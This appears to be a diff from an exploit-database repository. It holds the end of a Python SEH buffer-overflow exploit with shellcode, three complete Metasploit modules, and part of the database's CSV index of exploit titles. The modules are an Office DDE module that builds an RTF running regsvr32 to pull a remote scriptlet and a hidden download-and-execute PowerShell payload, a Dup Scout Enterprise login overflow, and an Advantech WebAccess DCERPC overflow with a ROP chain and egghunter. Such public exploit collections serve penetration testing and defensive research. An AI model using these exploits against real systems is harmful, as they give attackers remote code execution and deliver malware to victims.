shellcode += "\x46\x50\x4e\x56\x36\x66\x36\x32\x73\x31\x46\x45\x38"
shellcode += "\x33\x49\x5a\x6c\x77\x4f\x6f\x76\x4b\x4f\x58\x55\x6d"
shellcode += "\x59\x4d\x30\x42\x6e\x53\x66\x33\x76\x59\x6f\x66\x50"
shellcode += "\x63\x58\x66\x68\x6d\x57\x77\x6d\x31\x70\x39\x6f\x49"
shellcode += "\x45\x4d\x6b\x48\x70\x38\x35\x4d\x72\x42\x76\x31\x78"
shellcode += "\x69\x36\x7a\x35\x6d\x6d\x4d\x4d\x59\x6f\x5a\x75\x37"
shellcode += "\x4c\x53\x36\x33\x4c\x44\x4a\x6f\x70\x59\x6b\x4b\x50"
shellcode += "\x54\x35\x56\x65\x6d\x6b\x43\x77\x72\x33\x62\x52\x30"
shellcode += "\x6f\x51\x7a\x37\x70\x32\x73\x4b\x4f\x59\x45\x41\x41"
offset = shellcodeTest+"\x41"*(4144-len(shellcodeTest))
nseh = "\x71\x20" # jno short 34
nseh += "\x70\x20" # jo short 34
seh = struct.pack("<L",0x6521636C) # pop ebx # pop ecx # ret (Bytes Buenos)
junk = "\x42"*26+alignEsp+"\x42"*6000
payload = offset+nseh+seh+junk
print "\nSize Buffer: "+str(len(offset))
print "Size Payload: "+str(len(payload))
print "\n--------------EXPLOIT--------------\n"
print payload
print "\n----------------------------\n"
file=open('poc_dup.txt','w')
file.write(payload)
file.close()
# @s1kr10s

157
exploits/windows/remote/43338.rb Executable file
View file

@ -0,0 +1,157 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Powershell
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Office DDE Payload Delivery',
'Description' => %q{
This module generates an DDE command to place within
a word document, that when executed, will retrieve a HTA payload
via HTTP from an web server.
},
'Author' => 'mumbai',
'License' => MSF_LICENSE,
'DisclosureDate' => 'Oct 9 2017',
'References' => [
['URL', 'https://gist.github.com/xillwillx/171c24c8e23512a891910824f506f563'],
['URL', 'https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/']
],
'Arch' => [ARCH_X86, ARCH_X64],
'Platform' => 'win',
'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' =>
[
['Microsoft Office', {} ],
],
'DefaultTarget' => 0,
'Payload' => {
'DisableNops' => true
},
'DefaultOptions' => {
'DisablePayloadHandler' => false,
'PAYLOAD' => 'windows/meterpreter/reverse_tcp',
'EXITFUNC' => 'thread'
}
))
register_options([
OptString.new("FILENAME", [true, "Filename to save as", "msf.rtf"]),
OptPath.new("INJECT_PATH", [false, "Path to file to inject", nil])
])
end
def gen_psh(url, *method)
ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
if method.include? 'string'
download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))
else
# Random filename to use, if there isn't anything set
random = "#{rand_text_alphanumeric 8}.exe"
# Set filename (Use random filename if empty)
filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME']
# Set path (Use %TEMP% if empty)
path = datastore['BinaryEXE-PATH'].blank? ? "$env:temp" : %Q('#{datastore['BinaryEXE-PATH']}')
# Join Path and Filename
file = %Q(echo (#{path}+'\\#{filename}'))
# Generate download PowerShell command
download_string = Rex::Powershell::PshMethods.download_run(url, file)
end
download_and_run = "#{ignore_cert}#{download_string}"
# Generate main PowerShell command
return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)
end
def on_request_uri(cli, _request)
if _request.raw_uri =~ /\.sct$/
print_status("Handling request for .sct from #{cli.peerhost}")
payload = gen_psh("#{get_uri}", "string")
data = gen_sct_file(payload)
send_response(cli, data, 'Content-Type' => 'text/plain')
else
print_status("Delivering payload to #{cli.peerhost}...")
p = regenerate_payload(cli)
data = cmd_psh_payload(p.encoded,
payload_instance.arch.first,
remove_comspec: true,
exec_in_place: true
)
send_response(cli, data, 'Content-Type' => 'application/octet-stream')
end
end
def rand_class_id
"#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}"
end
def gen_sct_file(command)
# If the provided command is empty, a correctly formatted response is still needed (otherwise the system raises an error).
if command == ''
return %{<?XML version="1.0"?><scriptlet><registration progid="#{Rex::Text.rand_text_alphanumeric 8}" classid="{#{rand_class_id}}"></registration></scriptlet>}
# If a command is provided, tell the target system to execute it.
else
return %{<?XML version="1.0"?><scriptlet><registration progid="#{Rex::Text.rand_text_alphanumeric 8}" classid="{#{rand_class_id}}"><script><![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("#{command}",0);]]></script></registration></scriptlet>}
end
end
def retrieve_header(filename)
if (not datastore['INJECT_PATH'].nil?)
path = "#{datastore['INJECT_PATH']}"
else
path = nil
end
if (not path.nil?)
if ::File.file?(path)
::File.open(path, 'rb') do |fd|
header = fd.read(fd.stat.size).split('{\*\datastore').first
header = header.to_s
print_status("Injecting #{path}...")
return header
end
else
header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n"
header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n"
header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9' + "\n"
end
else
header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n"
header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n"
header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9' + "\n"
end
return header
end
def create_rtf
#
header = retrieve_header(datastore['FILENAME'])
field_class = '{\field{\*\fldinst {\rtlch\fcs1 \af31507 \ltrch\fcs0 \insrsid3807165 '
field_class << "DDEAUTO C:\\\\\\\\Programs\\\\\\\\Microsoft\\\\\\\\Office\\\\\\\\MSword.exe\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe \"/c regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll\" }}"
field_class << '{\fldrslt }}\sectd \ltrsect\linex0\endnhere\sectlinegrid360\sectdefaultcl\sftnbj {\rtlch\fcs1 \af31507 \ltrch\fcs0' + "\n"
field_class << '\insrsid5790315' + "\n"
field_class << '\par }'
footer = '}}' # footer
rtf = header + field_class + footer
rtf
end
def primer
file_create(create_rtf)
end
end

101
exploits/windows/remote/43339.rb Executable file
View file

@ -0,0 +1,101 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Dup Scout Enterprise Login Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Dup Scout Enterprise
10.0.18. The buffer overflow exists via the web interface during
login. This gives NT AUTHORITY\SYSTEM access.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Chris Higgins', # msf Module -- @ch1gg1ns
'sickness' # Original discovery
],
'References' =>
[
[ 'EDB', '43145' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x0a\x0d\x25\x26\x2b\x3d"
},
'Targets' =>
[
[ 'Dup Scout Enterprise 10.0.18',
{
'Ret' => 0x10090c83, # jmp esp - libspp.dll
'Offset' => 780
}
],
],
'Privileged' => true,
'DisclosureDate' => 'Nov 14 2017',
'DefaultTarget' => 0))
register_options([Opt::RPORT(80)])
end
def check
res = send_request_cgi({
'uri' => '/',
'method' => 'GET'
})
if res and res.code == 200 and res.body =~ /Dup Scout Enterprise v10\.0\.18/
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
connect
print_status("Generating exploit...")
evil = rand_text(target['Offset'])
evil << [target.ret].pack('V')
evil << make_nops(12)
evil << payload.encoded
evil << make_nops(10000 - evil.length)
vprint_status("Evil length: " + evil.length.to_s)
sploit = "username="
sploit << evil
sploit << "&password="
sploit << rand_text(evil.length)
sploit << "\r\n"
print_status("Triggering the exploit now...")
res = send_request_cgi({
'uri' => '/login',
'method' => 'POST',
'content-type' => 'application/x-www-form-urlencoded',
'content-length' => '17000',
'data' => sploit
})
handler
disconnect
end
end

141
exploits/windows/webapps/43340.rb Executable file
View file

@ -0,0 +1,141 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Egghunter
def initialize(info = {})
super(update_info(info,
'Name' => 'Advantech WebAccess Webvrpcs Service Opcode 80061 Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Advantech WebAccess 8.2.
By sending a specially crafted DCERPC request, an attacker could overflow
the buffer and execute arbitrary code.
},
'Author' => [ 'mr_me <mr_me[at]offensive-security[dot]com>' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'ZDI', '17-938' ],
[ 'CVE', '2017-14016' ],
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-306-02' ]
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 2048,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows 7 x86 - Advantech WebAccess 8.2-2017.03.31',
{
'Ret' => 0x07036cdc, # pop ebx; add esp, 994; retn 0x14
'Slide' => 0x07048f5b, # retn
'Jmp' => 0x0706067e # pop ecx; pop ecx; ret 0x04
}
],
],
'DisclosureDate' => 'Nov 02 2017',
'DefaultTarget' => 0))
register_options([ Opt::RPORT(4592)])
end
def create_rop_chain()
# this target opts into dep
rop_gadgets =
[
0x020214c6, # POP EAX # RETN [BwKrlAPI.dll]
0x0203a134, # ptr to &VirtualAlloc() [IAT BwKrlAPI.dll]
0x02032fb4, # MOV EAX,DWORD PTR DS:[EAX] # RETN [BwKrlAPI.dll]
0x070738ee, # XCHG EAX,ESI # RETN [BwPAlarm.dll]
0x0201a646, # POP EBP # RETN [BwKrlAPI.dll]
0x07024822, # & push esp # ret [BwPAlarm.dll]
0x070442dd, # POP EAX # RETN [BwPAlarm.dll]
0xffffffff, # Value to negate, will become 0x00000001
0x070467d2, # NEG EAX # RETN [BwPAlarm.dll]
0x0704de61, # PUSH EAX # ADD ESP,0C # POP EBX # RETN [BwPAlarm.dll]
rand_text_alpha(4).unpack('V'),
rand_text_alpha(4).unpack('V'),
rand_text_alpha(4).unpack('V'),
0x02030af7, # POP EAX # RETN [BwKrlAPI.dll]
0xfbdbcbd5, # put delta into eax (-> put 0x00001000 into edx)
0x02029003, # ADD EAX,424442B # RETN [BwKrlAPI.dll]
0x0201234a, # XCHG EAX,EDX # RETN [BwKrlAPI.dll]
0x07078df5, # POP EAX # RETN [BwPAlarm.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x070467d2, # NEG EAX # RETN [BwPAlarm.dll]
0x07011e60, # PUSH EAX # ADD AL,5B # POP ECX # RETN 0x08 [BwPAlarm.dll]
0x0706fe66, # POP EDI # RETN [BwPAlarm.dll]
rand_text_alpha(4).unpack('V'),
rand_text_alpha(4).unpack('V'),
0x0703d825, # RETN (ROP NOP) [BwPAlarm.dll]
0x0202ca65, # POP EAX # RETN [BwKrlAPI.dll]
0x90909090, # nop
0x07048f5a, # PUSHAD # RETN [BwPAlarm.dll]
].flatten.pack("V*")
return rop_gadgets
end
def exploit
connect
handle = dcerpc_handle('5d2b62aa-ee0a-4a95-91ae-b064fdb471fc', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
print_status("Binding to #{handle} ...")
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")
# send the request to get the handle
resp = dcerpc.call(0x4, [0x02000000].pack('V'))
handle = resp.last(4).unpack('V').first
print_good("Got a handle: 0x%08x" % handle)
egg_options = { :eggtag => "0day" }
egghunter, egg = generate_egghunter(payload.encoded, payload_badchars, egg_options)
# apparently this is called a ret chain
overflow = [target['Slide']].pack('V')
overflow << [target['Slide']].pack('V')
overflow << [target['Slide']].pack('V')
overflow << [target['Slide']].pack('V')
overflow << [target['Slide']].pack('V')
overflow << [target['Slide']].pack('V')
overflow << [target['Jmp']].pack('V')
overflow << [target['Ret']].pack('V')
overflow << [target['Slide']].pack('V')
overflow << [target['Slide']].pack('V')
overflow << [target['Slide']].pack('V')
overflow << [target['Slide']].pack('V')
overflow << [target['Slide']].pack('V')
overflow << [target['Slide']].pack('V')
overflow << create_rop_chain()
overflow << egghunter
overflow << egg
overflow << rand_text_alpha(0x1000-overflow.length)
# sorry but I dont like msf's ndr class.
sploit = [handle].pack('V')
sploit << [0x000138bd].pack('V') # opcode we are attacking
sploit << [0x00001000].pack('V') # size to copy
sploit << [0x00001000].pack('V') # size of string
sploit << overflow
print_status("Trying target #{target.name}...")
begin
dcerpc_call(0x1, sploit)
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
ensure
disconnect
end
handler
end
end

13
files_exploits.csv
View file

@ -16023,11 +16023,16 @@ id,file,description,date,author,type,platform,port
43195,exploits/windows/remote/43195.py,"HP iMC Plat 7.2 - Remote Code Execution",2017-11-28,"Chris Lyne",remote,windows,
43193,exploits/unix/remote/43193.rb,"pfSense - Authenticated Group Member Remote Command Execution (Metasploit)",2017-11-29,Metasploit,remote,unix,443
43198,exploits/windows/remote/43198.py,"HP iMC Plat 7.2 - Remote Code Execution (2)",2017-11-29,"Chris Lyne",remote,windows,
43202,exploits/windows/remote/43202.py,"Dup Scout Enterprise 10.0.18 - 'Input Directory' Local Buffer Overflow (SEH)",2017-11-29,"Miguel Mendez Z",remote,windows,
43209,exploits/windows/remote/43209.py,"VX Search 10.2.14 - 'command_name' Buffer Overflow",2017-12-05,W01fier00t,remote,windows,80
43226,exploits/cgi/remote/43226.py,"LaCie 5big Network 2.2.8 - Command Injection",2017-12-07,"Timo Sablowski",remote,cgi,
43230,exploits/unix/remote/43230.rb,"Polycom Shell HDX Series - Traceroute Command Execution (Metasploit)",2017-12-07,Metasploit,remote,unix,23
43231,exploits/windows/remote/43231.py,"Claymore Dual ETH + DCR/SC/LBC/PASC GPU Miner - Stack Buffer Overflow / Path Traversal",2017-12-07,tintinweb,remote,windows,
43236,exploits/windows/remote/43236.py,"LabF nfsAxe FTP Client 3.7 - Buffer Overflow (DEP Bypass)",2017-12-08,wetw0rk,remote,windows,21
43338,exploits/windows/remote/43338.rb,"Microsoft Office - DDE Payload Delivery (Metasploit)",2017-12-14,Metasploit,remote,windows,
43339,exploits/windows/remote/43339.rb,"Dup Scout Enterprise - Login Buffer Overflow (Metasploit)",2017-12-14,Metasploit,remote,windows,
43341,exploits/php/remote/43341.rb,"pfSense 2.4.1 - CSRF Error Page Clickjacking (Metasploit)",2017-12-14,Metasploit,remote,php,
43342,exploits/hardware/remote/43342.txt,"Palo Alto Networks Firewalls - Remote root Code Execution",2017-12-14,"Philip Pettersson",remote,hardware,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -38360,4 +38365,12 @@ id,file,description,date,author,type,platform,port
43316,exploits/php/webapps/43316.txt,"Vanguard 1.4 - SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,
43323,exploits/php/webapps/43323.txt,"Joomla! Component JBuildozer 1.4.1 - 'appid' SQL Injection",2017-12-12,"Ihsan Sencan",webapps,php,80
43324,exploits/php/webapps/43324.txt,"Accesspress Anonymous Post Pro < 3.2.0 - Unauthenticated Arbitrary File Upload",2017-12-12,"Colette Chamberland",webapps,php,80
43329,exploits/php/webapps/43329.txt,"Joomla! Component JEXTN Question And Answer 3.1.0 - SQL Injection",2017-12-13,"Ihsan Sencan",webapps,php,
43330,exploits/php/webapps/43330.txt,"Joomla! Component JEXTN Video Gallery 3.0.5 - 'id' SQL Injection",2017-12-13,"Ihsan Sencan",webapps,php,
43332,exploits/cgi/webapps/43332.txt,"Meinberg LANTIME Web Configuration Utility 6.16.008 - Arbitrary File Read",2017-12-13,"Jakub Palaczynski",webapps,cgi,443
43333,exploits/php/webapps/43333.txt,"Readymade Video Sharing Script 3.2 - HTML Injection",2017-12-14,"Ihsan Sencan",webapps,php,
43334,exploits/php/webapps/43334.txt,"Paid To Read Script 2.0.5 - 'uid' / 'fnum' / 'fn' SQL Injection",2017-12-14,"Ihsan Sencan",webapps,php,
43335,exploits/php/webapps/43335.html,"FS Lynda Clone 1.0 - SQL Injection",2017-12-14,"Ihsan Sencan",webapps,php,
43336,exploits/php/webapps/43336.html,"Bus Booking Script 1.0 - 'txtname' SQL Injection",2017-12-14,"Ihsan Sencan",webapps,php,
43337,exploits/php/webapps/43337.txt,"Piwigo 2.9.1 - 'cat_true' / 'cat_false' SQL Injection",2017-12-14,Akityo,webapps,php,
43340,exploits/windows/webapps/43340.rb,"Advantech WebAccess 8.2-2017.03.31 - Webvrpcs Service Opcode 80061 Stack Buffer Overflow (Metasploit)",2017-12-14,Metasploit,webapps,windows,4592

Can't render this file because it is too large.